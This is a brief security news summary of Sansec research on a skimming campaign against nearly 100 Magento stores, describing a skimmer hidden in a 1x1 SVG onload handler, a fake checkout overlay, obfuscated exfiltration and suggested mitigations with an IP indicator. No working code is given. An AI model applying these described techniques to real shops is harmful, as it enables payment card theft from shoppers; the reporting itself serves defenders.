A large campaign targeting nearly 100 Magento e-commerce stores injects a credit-card skimmer hidden inside a 1Γ1-pixel SVG image that executes via an onload atob() handler. Researchers at Sansec link the attacks to exploitation of the PolyShell vulnerability and trace exfiltration to IncogNet-hosted domains, urging immediate mitigations and upgrades. #Magento #PolyShell
Keypoints
- Nearly 100 Magento stores were compromised by a skimmer embedded as a 1Γ1 SVG with an onload handler.
- The onload contains a base64-encoded payload executed inline to evade detection by security scanners.
- A fake βSecure Checkoutβ overlay intercepts checkout clicks and validates card and billing details in real time.
- Stolen payment data is XOR-encrypted, base64-obfuscated, and sent to six exfiltration domains hosted at IncogNet (AS40663).
- Sansec attributes the campaign to PolyShell exploitation and recommends removing SVGs using atob(), checking _mgx_cv in localStorage, blocking 23.137.249.67 and unfamiliar analytics endpoints, and upgrading Magento.